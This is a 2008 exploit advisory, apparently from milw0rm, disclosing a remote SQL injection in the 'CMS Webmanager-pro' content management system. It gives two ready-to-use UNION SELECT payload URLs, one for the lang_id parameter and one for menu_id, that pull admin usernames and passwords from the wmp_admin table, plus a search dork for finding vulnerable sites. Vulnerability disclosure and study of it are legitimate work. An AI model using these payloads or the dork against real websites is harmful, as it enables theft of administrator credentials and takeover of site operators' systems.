1 :::::::−. ... ::::::. :::.
2 ;;, ‘’;, ;; ;;;‘;;;;, ‘;;;
3 ‘[[ [[[[’ [[[ [[[[[. ’[[
4 $, $$ $$ $$ "Y$c$
5 888_,o8P’88 .d888 888 Y88
6 MMMMP"‘ "YmmMMMM"" MMM YM
7
8 [ Discovered by dun \ dun[at]strcpy.eu ]
9
10 ##################################################################
11 # [ CMS Webmanager−pro ] Remote SQL Injection Vulnerability #
12 ##################################################################
13 #
14 # Script site: http://webmanager−pro.com/
15 #
16 # Vuln:
17 # http://site.com/index.php?lang_id=−1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin
+limit+0,1/*
18 # http://site.com/index.php?menu_id=−1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin
+limit+0,1/*
19 #
20 # Dork example: "CMS Webmanager−pro"
21 #
22 ###############################################
23 # Greetz: D3m0n_DE * sid_psycho * and otherz..
24 ###############################################
25
26 [ dun / 2008 ]
27
28 *******************************************************************************************
29
30 # milw0rm.com [2008−05−18]
Page 1/1
CMS WebManagerPro Multiple Remote SQL Injection Vulnerabilities
dun
05/18/2008